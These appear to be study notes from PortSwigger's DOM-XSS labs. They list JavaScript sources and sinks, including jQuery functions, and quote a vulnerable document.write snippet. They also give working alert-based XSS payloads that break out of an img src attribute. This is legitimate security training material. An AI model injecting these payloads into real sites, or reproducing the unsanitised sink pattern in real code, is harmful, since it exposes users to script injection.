https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

common sources

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:

document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent

The following jQuery functions are also sinks that can lead to DOM-XSS vulnerabilities:

add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()

DOM XSS in document.write sink using source location.search

our input is placed inside an img src attribute, here is the vulnerable code context :

<script>
   function trackSearch(query) {
          document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
   }
   var query = (new URLSearchParams(window.location.search)).get('search');
   if(query) {
          trackSearch(query);
   }
</script>

"><svg onload=alert(1)>
"><img src=1 onerror=alert()> --> triggers an alert but does not validate the lab
"><script>alert()</script>

DOM XSS in document.write sink using source location.search inside a select element

The JavaScript extracts a storeId parameter from the location.search source. It then uses document.write to create a new option in the select element for the stock checker functionality.